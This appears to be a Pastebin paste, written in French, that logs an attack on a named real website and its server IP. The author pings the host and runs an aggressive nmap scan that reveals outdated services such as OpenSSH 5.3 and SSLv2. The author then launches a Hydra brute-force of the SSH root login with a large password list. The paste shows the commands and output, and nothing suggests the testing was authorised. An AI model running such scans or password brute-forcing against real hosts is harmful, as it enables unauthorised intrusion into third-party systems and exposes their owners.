Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Pour le site fermeduchapiron.fr
- Je remarque qu'il ne possède pas de certificat SSL, je décide donc de faire un ping afin de récupérer son IP :
- darto@invictus:[~]: ping fermeduchapiron.fr
- PING fermeduchapiron.fr (188.165.224.172) 56(84) bytes of data.
- 64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=1 ttl=128 time=30.7 ms
- 64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=2 ttl=128 time=88.2 ms
- 64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=3 ttl=128 time=185 ms
- ^C
- --- fermeduchapiron.fr ping statistics ---
- 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
- rtt min/avg/max/mdev = 30.762/101.353/185.052/63.667 ms
- Ensuite je fais un nmap afin de voir quels ports et services sont exposés :
- darto@invictus:[~]: sudo nmap -A -v sV -O 188.165.224.172
- Starting Nmap 6.47 ( http://nmap.org ) at 2018-09-25 11:45 CEST
- NSE: Loaded 118 scripts for scanning.
- NSE: Script Pre-scanning.
- Failed to resolve "sV".
- Initiating Ping Scan at 11:45
- Scanning 188.165.224.172 [4 ports]
- Completed Ping Scan at 11:45, 1.06s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 11:45
- Completed Parallel DNS resolution of 1 host. at 11:45, 0.24s elapsed
- Initiating SYN Stealth Scan at 11:45
- Scanning ns212328.ip-188-165-224.eu (188.165.224.172) [1000 ports]
- Discovered open port 110/tcp on 188.165.224.172
- Discovered open port 995/tcp on 188.165.224.172
- Discovered open port 25/tcp on 188.165.224.172
- Discovered open port 22/tcp on 188.165.224.172
- Discovered open port 53/tcp on 188.165.224.172
- Discovered open port 993/tcp on 188.165.224.172
- Discovered open port 21/tcp on 188.165.224.172
- Discovered open port 143/tcp on 188.165.224.172
- Discovered open port 587/tcp on 188.165.224.172
- Discovered open port 443/tcp on 188.165.224.172
- Discovered open port 80/tcp on 188.165.224.172
- SYN Stealth Scan Timing: About 26.72% done; ETC: 11:47 (0:01:25 remaining)
- Discovered open port 106/tcp on 188.165.224.172
- Discovered open port 465/tcp on 188.165.224.172
- SYN Stealth Scan Timing: About 56.27% done; ETC: 11:47 (0:01:10 remaining)
- Discovered open port 8443/tcp on 188.165.224.172
- SYN Stealth Scan Timing: About 70.38% done; ETC: 11:48 (0:00:54 remaining)
- SYN Stealth Scan Timing: About 81.45% done; ETC: 11:48 (0:00:36 remaining)
- Completed SYN Stealth Scan at 11:48, 204.19s elapsed (1000 total ports)
- Initiating Service scan at 11:48
- Scanning 14 services on ns212328.ip-188-165-224.eu (188.165.224.172)
- Completed Service scan at 11:48, 19.66s elapsed (14 services on 1 host)
- Initiating OS detection (try #1) against ns212328.ip-188-165-224.eu (188.165.224.172)
- Retrying OS detection (try #2) against ns212328.ip-188-165-224.eu (188.165.224.172)
- Initiating Traceroute at 11:49
- Completed Traceroute at 11:49, 0.02s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 11:49
- Completed Parallel DNS resolution of 2 hosts. at 11:49, 0.06s elapsed
- NSE: Script scanning 188.165.224.172.
- Initiating NSE at 11:49
- Completed NSE at 11:51, 150.69s elapsed
- Nmap scan report for ns212328.ip-188-165-224.eu (188.165.224.172)
- Host is up (0.044s latency).
- Not shown: 984 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD 1.3.4c
- | ssl-cert: Subject: commonName=sciweb.fr
- | Issuer: commonName=WoSign CA Free SSL Certificate G2/organizationName=WoSign CA Limited/countryName=CN
- | Public Key type: rsa
- | Public Key bits: 2048
- | Not valid before: 2016-02-24T20:12:37+00:00
- | Not valid after: 2019-02-24T20:12:37+00:00
- | MD5: 3917 cdbb 33fc 0c05 68a9 e959 465c 6afd
- |_SHA-1: e343 5003 0f28 d773 f9c1 e96b 3deb aa8d fcf9 40ab
- |_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 bf:8f:de:e6:cb:61:b3:3f:92:6d:25:49:05:10:e2:b7 (DSA)
- |_ 2048 73:6e:1b:44:49:ca:62:6f:8c:f6:d1:6a:36:17:12:17 (RSA)
- 25/tcp open smtp Postfix smtpd
- |_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, STARTTLS, AUTH DIGEST-MD5 LOGIN PLAIN CRAM-MD5, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
- | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Public Key type: rsa
- | Public Key bits: 1024
- | Not valid before: 2014-01-22T19:02:55+00:00
- | Not valid after: 2016-01-22T19:02:55+00:00
- | MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
- |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
- |_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
- 53/tcp open domain ISC BIND none
- | dns-nsid:
- |_ bind.version: none
- 80/tcp open http nginx
- |_http-favicon: Parallels Control Panel
- |_http-methods: GET HEAD POST OPTIONS
- |_http-title: Default Parallels Plesk Panel Page
- 106/tcp open pop3pw poppassd
- 110/tcp open pop3 Courier pop3d
- |_pop3-capabilities: PIPELINING SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 PLAIN) TOP STLS USER LOGIN-DELAY(10) IMPLEMENTATION(Courier Mail Server) APOP UIDL
- 143/tcp open imap Courier Imapd (released 2011)
- |_imap-capabilities: IDLE THREAD=ORDEREDSUBJECT AUTH=PLAIN ACL2=UNION CAPABILITY IMAP4rev1 SORT AUTH=CRAM-MD5 UIDPLUS NAMESPACE completed ACL AUTH=CRAM-SHA256 AUTH=CRAM-SHA1 OK CHILDREN THREAD=REFERENCES QUOTA STARTTLSA0001
- 443/tcp open http nginx
- |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
- |_http-title: 400 The plain HTTP request was sent to HTTPS port
- | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
- | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Not valid before: 2014-01-22T19:05:41+00:00
- | Not valid after: 2015-01-22T19:05:41+00:00
- | MD5: fe25 5bcf 00a6 3558 8231 1aed 2145 b67b
- |_SHA-1: bcb0 1091 a602 c3f3 1661 a989 b6e3 1a4a 2040 3d71
- |_ssl-date: 2018-09-25T09:49:23+00:00; +7s from local time.
- | sslv2:
- | SSLv2 supported
- |_ ciphers: none
- 445/tcp filtered microsoft-ds
- 465/tcp open ssl/smtp Postfix smtpd
- |_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, AUTH DIGEST-MD5 LOGIN PLAIN CRAM-MD5, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
- | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Public Key type: rsa
- | Public Key bits: 1024
- | Not valid before: 2014-01-22T19:02:55+00:00
- | Not valid after: 2016-01-22T19:02:55+00:00
- | MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
- |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
- 514/tcp filtered shell
- 587/tcp open smtp Postfix smtpd
- |_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
- | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Public Key type: rsa
- | Public Key bits: 1024
- | Not valid before: 2014-01-22T19:02:55+00:00
- | Not valid after: 2016-01-22T19:02:55+00:00
- | MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
- |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
- |_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
- 993/tcp open ssl/imap Courier Imapd (released 2011)
- |_imap-capabilities: IDLE THREAD=ORDEREDSUBJECT AUTH=PLAIN CAPABILITY IMAP4rev1 SORT AUTH=CRAM-MD5 ACL2=UNIONA0001 NAMESPACE completed ACL AUTH=CRAM-SHA256 AUTH=CRAM-SHA1 UIDPLUS OK THREAD=REFERENCES QUOTA CHILDREN
- | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Public Key type: rsa
- | Public Key bits: 1024
- | Not valid before: 2014-01-22T19:02:55+00:00
- | Not valid after: 2016-01-22T19:02:55+00:00
- | MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
- |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
- | sslv2:
- | SSLv2 supported
- | ciphers:
- |_ SSL2_DES_192_EDE3_CBC_WITH_MD5
- 995/tcp open ssl/pop3 Courier pop3d
- |_pop3-capabilities: APOP IMPLEMENTATION(Courier Mail Server) USER SASL(LOGIN PLAIN) TOP UIDL PIPELINING LOGIN-DELAY(10)
- | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
- | Public Key type: rsa
- | Public Key bits: 1024
- | Not valid before: 2014-01-22T19:02:55+00:00
- | Not valid after: 2016-01-22T19:02:55+00:00
- | MD5: 8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
- |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
- | sslv2:
- | SSLv2 supported
- | ciphers:
- |_ SSL2_DES_192_EDE3_CBC_WITH_MD5
- 8443/tcp open http nginx
- |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
- |_http-title: 400 The plain HTTP request was sent to HTTPS port
- | ssl-cert: Subject: commonName=sciweb.fr
- | Issuer: commonName=WoSign CA Free SSL Certificate G2/organizationName=WoSign CA Limited/countryName=CN
- | Public Key type: rsa
- | Public Key bits: 2048
- | Not valid before: 2016-02-24T20:12:37+00:00
- | Not valid after: 2019-02-24T20:12:37+00:00
- | MD5: 3917 cdbb 33fc 0c05 68a9 e959 465c 6afd
- |_SHA-1: e343 5003 0f28 d773 f9c1 e96b 3deb aa8d fcf9 40ab
- |_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
- Device type: general purpose|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.4.X|3.X (98%), Microsoft Windows 7|XP (96%), BlueArc embedded (91%), Pirelli embedded (88%)
- OS CPE: cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/o:microsoft:windows_7:::enterprise cpe:/o:microsoft:windows_xp::sp3 cpe:/h:bluearc:titan_2100 cpe:/h:pirelli:dp-10
- Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Microsoft Windows 7 Enterprise (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%), Pirelli DP-10 VoIP phone (88%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 2 hops
- TCP Sequence Prediction: Difficulty=261 (Good luck!)
- IP ID Sequence Generation: Incremental
- Service Info: Hosts: sciweb.fr, localhost.localdomain; OS: Unix
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 0.12 ms 192.168.23.2
- 2 0.10 ms ns212328.ip-188-165-224.eu (188.165.224.172)
- NSE: Script Post-scanning.
- Initiating NSE at 11:51
- Completed NSE at 11:51, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 403.58 seconds
- Raw packets sent: 1275 (59.332KB) | Rcvd: 1244 (50.404KB)
- Je remarque que le port 22 est ouvert, et qu'il est donc possible de se connecter en SSH. Le login via root directement est possible et je lance donc un bruteforce afin de trouver un mot de passe :
- darto@invictus:[~]: hydra -l root -P passwd.txt -t 10 -w 2 -s 22 -f 188.165.224.172 ssh
- Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
- [WARNING] the waittime you set is low, this can result in errornous results
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-25 11:34:19
- [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
- [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
- [DATA] max 10 tasks per 1 server, overall 10 tasks, 100083 login tries (l:1/p:100083), ~1000 tries per task
- [DATA] attacking service ssh on port 22
- [STATUS] 100.00 tries/min, 100 tries in 00:01h, 99983 todo in 16:40h, 10 active
- [STATUS] 73.33 tries/min, 220 tries in 00:03h, 99863 todo in 22:42h, 10 active
- [STATUS] 65.71 tries/min, 460 tries in 00:07h, 99623 todo in 25:17h, 10 active
- [STATUS] 62.67 tries/min, 940 tries in 00:15h, 99143 todo in 26:23h, 10 active
- Bisous
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement